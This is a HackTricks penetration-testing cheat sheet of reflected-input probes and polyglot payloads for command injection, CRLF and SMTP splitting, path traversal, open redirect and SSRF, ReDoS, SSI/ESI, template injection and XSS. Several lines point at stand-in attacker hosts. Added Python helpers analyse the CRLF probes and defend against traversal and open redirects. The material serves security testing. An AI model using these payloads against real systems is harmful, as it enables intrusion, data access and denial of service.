# Reflecting Techniques - PoCs and Polyglots CheatSheet
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

- If you want to see your company advertised in HackTricks or download HackTricks in PDF, check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the Telegram group, or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud GitHub repos.
The goal of these PoCs and polyglots is to give the tester a quick summary of the vulnerabilities they may be able to exploit when their input is somehow reflected in the response.
{% hint style="warning" %}
This cheatsheet does not propose an exhaustive list of tests for each vulnerability, only some basic ones. If you are looking for more complete tests, go to each proposed vulnerability.
{% endhint %}

{% hint style="danger" %}
You will not find Content-Type-dependent injections such as XXE here, since you will usually try those yourself when you find a request that sends XML data. Nor will you find database injections, because even if some content may be reflected, it depends heavily on the technology and structure of the backend database.
{% endhint %}
## Polyglots list

```
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```
## Client Side Template Injection

### Basic Tests

```
{{7*7}}
[7*7]
```

### Polyglots
Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:

- HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.
- PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.
- Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.
- ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.
- XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.
- CSV/JavaScript Polyglots: These files can be interpreted as both CSV (Comma-Separated Values) and JavaScript. They can be used to execute JavaScript code when opened in a spreadsheet program, bypassing any security measures that may be in place for CSV files.

Polyglots can be created by carefully crafting the file structure and taking advantage of the different parsing rules for each file type. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or executing arbitrary code.
```
{{7*7}}[7*7]
```
## Command Injection

### Basic Tests

```bash
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
```
### Polyglots
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
## CRLF

### Basic Tests
#### HTTP Response Splitting - CRLF Injection

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ASet-Cookie:%20test=test
```
#### HTTP Response Splitting - Location Header

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ALocation:%20http://malicious.com
```
#### SMTP Response Splitting - CRLF Injection

The SMTP variants below place mail commands or mail headers after the line break; they only take effect where the reflected value ends up in a message the application hands to a mail server, not in the HTTP response itself.

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AMAIL%20FROM:%20<test@example.com>
```
#### SMTP Response Splitting - RCPT TO

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ARCPT%20TO:%20<test@example.com>
```

#### SMTP Response Splitting - DATA

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ADATA
```

#### SMTP Response Splitting - Subject

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ASubject:%20Test
```

#### SMTP Response Splitting - Content-Type

```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3Ch1%3ETest%3C/h1%3E%3C/body%3E%3C/html%3E
```
```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
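To see what each URL-encoded probe above would do once a vulnerable application copies the decoded value into a response header unchecked, the following added helper (not part of the original cheat sheet) decodes a probe, lists the headers it would smuggle in, and flags the last probe's embedded second `HTTP/1.1 200 OK` response; `safe_header_value` is the corresponding defence, refusing any value that carries CR, LF or NUL. The probe list is copied from the block above; everything else is illustrative.

```python
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# The four basic CRLF probes from the cheat sheet, exactly as they travel
# URL-encoded inside a query parameter (copied from the block above).
CRLF_PROBES = [
    "%0d%0aLocation:%20http://attacker.com",
    "%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E",
    "%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E",
    "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E",
]


@dataclass
class CrlfAnalysis:
    injected_headers: List[str]   # header names the value would append to the response
    body: Optional[str]           # text that would land after the header block, if any
    splits_response: bool         # that text itself begins a second HTTP response


def decode_param(raw: str) -> str:
    """Decode the probe the way a server decodes a query-string value."""
    return urllib.parse.unquote(raw)


def analyze_crlf_probe(raw: str) -> CrlfAnalysis:
    """Simulate a server that writes the decoded value into a header without checks."""
    decoded = decode_param(raw)
    # Everything up to the first line break is still part of the legitimate header;
    # each later line is parsed as a new header, and a blank line ends the header block.
    segments = decoded.replace("\r\n", "\n").split("\n")[1:]
    headers: List[str] = []
    body: Optional[str] = None
    for i, segment in enumerate(segments):
        if segment == "":
            body = "\n".join(segments[i + 1:])
            break
        if ":" in segment:
            headers.append(segment.split(":", 1)[0].strip())
    return CrlfAnalysis(headers, body, body is not None and body.startswith("HTTP/"))


def safe_header_value(value: str) -> str:
    """Defence: a header value may never contain CR, LF or NUL (RFC 7230 field-value).

    Raise instead of silently stripping, so the attempt shows up in application logs.
    """
    if any(c in value for c in "\r\n\x00"):
        raise ValueError("control characters in header value")
    return value


if __name__ == "__main__":
    for probe in CRLF_PROBES:
        result = analyze_crlf_probe(probe)
        print(result.injected_headers, "splits response:", result.splits_response)
```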
## Dangling Markup

### Basic Tests
```markup
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
```
## File Inclusion/Path Traversal

### Basic Tests

```bash
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
```
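Each probe above targets a different gap in path handling: backslash separators, absolute paths, Windows drive letters, remote URLs and UNC shares. The added function below (illustrative, not part of the original cheat sheet) is the defensive counterpart: it normalises a user-supplied path and refuses every one of those forms, returning a path only when it stays under the chosen root. The probe list is copied from the block above; the root directory is a constructed value.

```python
import posixpath
from typing import Optional

# Probes from the File Inclusion/Path Traversal block above, copied here as test input.
TRAVERSAL_PROBES = [
    "/etc/passwd",
    "../../../../../../etc/hosts",
    "..\\..\\..\\..\\..\\..\\etc/hosts",
    "/etc/hostname",
    "C:/windows/system32/drivers/etc/hosts",
    "../../../../../../windows/system32/drivers/etc/hosts",
    "..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts",
    "http://asdasdasdasd.burpcollab.com/mal.php",
    "\\\\asdasdasdasd.burpcollab.com/mal.php",
]


def resolve_under_root(root: str, user_path: str) -> Optional[str]:
    """Return the path under `root` that `user_path` names, or None if it must be refused.

    Normalises before checking, so each probe above is caught by the rule written for it.
    """
    if "\x00" in user_path:
        return None                      # NUL truncates the path in C-based file APIs
    # Windows and many frameworks accept "\" as a separator, so treat it like "/"
    # before looking for ".." (this is what makes the "..\..\" probes traversal too).
    candidate = user_path.replace("\\", "/")
    if "://" in candidate or candidate.startswith("//"):
        return None                      # remote URL or UNC share: not a file under root
    if len(candidate) > 1 and candidate[1] == ":":
        return None                      # Windows drive letter: absolute on Windows
    if candidate.startswith("/"):
        return None                      # absolute path: never relative to root
    normalized = posixpath.normpath(candidate)
    if normalized == ".." or normalized.startswith("../"):
        return None                      # still climbs out of root after collapsing "." and ".."
    return posixpath.join(root, normalized)


if __name__ == "__main__":
    for probe in TRAVERSAL_PROBES:
        print(repr(probe), "->", resolve_under_root("/srv/files", probe))
```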
## Open Redirect / Server Side Request Forgery

### Basic Tests

```bash
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
```
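The probes above are built to defeat allow-list checks that look at the raw string: `www.whitelisted.com.evil.com` passes a prefix test, `//google.com` has no scheme but is absolute to a browser, and `javascript:` is not a web address at all. As an added illustration (not from the original cheat sheet), `naive_is_allowed` is that weak check and `safe_redirect_target` the corrected one, which parses the URL and compares the host exactly; the allow-list is a constructed value.

```python
from typing import Iterable, Optional
from urllib.parse import urlsplit

# Probes from the Open Redirect / SSRF block above, copied here as test input.
REDIRECT_PROBES = [
    "www.whitelisted.com",
    "www.whitelisted.com.evil.com",
    "https://google.com",
    "//google.com",
    "javascript:alert(1)",
]

ALLOWED_HOSTS = {"www.whitelisted.com"}   # constructed allow-list for the demo


def naive_is_allowed(url: str, allowed: Iterable[str] = ALLOWED_HOSTS) -> bool:
    """The check the probes are designed to defeat: a prefix test on the raw string."""
    return any(url.startswith(host) for host in allowed)


def safe_redirect_target(url: str, allowed: Iterable[str] = ALLOWED_HOSTS) -> Optional[str]:
    """Return `url` if it may be used as a redirect target, else None.

    Accepts same-origin paths and absolute http(s) URLs whose host is on the
    allow-list; everything else (other schemes, scheme-relative URLs, host
    look-alikes, userinfo tricks) is refused.
    """
    target = url.strip()
    # A single leading "/" is a same-origin path; "//" and "/\" are treated as
    # scheme-relative by browsers, so they are not.
    if target.startswith("/") and not target.startswith(("//", "/\\")):
        return target
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https"):
        return None                      # blocks javascript:, data:, and bare host strings
    if parts.hostname is None:
        return None
    # Exact host comparison: "www.whitelisted.com.evil.com" and
    # "www.whitelisted.com@evil.com" both parse to a host that is not allowed.
    if parts.hostname.lower() not in {h.lower() for h in allowed}:
        return None
    return target


if __name__ == "__main__":
    for probe in REDIRECT_PROBES:
        print(repr(probe), "naive:", naive_is_allowed(probe), "safe:", safe_redirect_target(probe))
```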
## ReDoS

### Basic Tests

Each test feeds the nested-quantifier pattern `((a+)+)+$` a string that almost matches (a run of `a` ended by a character the pattern rejects), so the backtracking engine tries every way of splitting the run before failing; the runtime roughly doubles with every extra character, so raise the length until the call visibly stalls.

<details>
<summary>Test 1</summary>

```javascript
/^((a+)+)+$/.test('a'.repeat(16) + '!')
```

</details>

<details>
<summary>Test 2</summary>

```javascript
/^((a+)+)+$/.test('a'.repeat(20) + '!')
```

</details>

<details>
<summary>Test 3</summary>

```javascript
/^((a+)+)+$/.test('a'.repeat(24) + '!')
```

</details>

### Advanced Tests

<details>
<summary>Test 1</summary>

```javascript
/^((a+)+)+$/.test('a'.repeat(26) + '!')
```

</details>

<details>
<summary>Test 2</summary>

```javascript
/^((a+)+)+$/.test('a'.repeat(28) + '!')
```

</details>

<details>
<summary>Test 3</summary>

```javascript
/^((a+)+)+$/.test('a'.repeat(30) + '!')
```

</details>
## Server Side Inclusion/Edge Side Inclusion

### Basic Tests

```markup
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```
### Polyglots
```markup
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```
## Server Side Request Forgery

The same tests used for Open Redirect can be used here.
## Server Side Template Injection

### Basic Tests

```markup
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
```
### Polyglots
```
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
```
## XSLT Server Side Injection

### Basic Tests

```markup
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```
### Polyglots
```markup
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
```
## XSS

### Basic Tests

```markup
<script>alert('XSS')</script>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
```
### Polyglots
```markup
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
```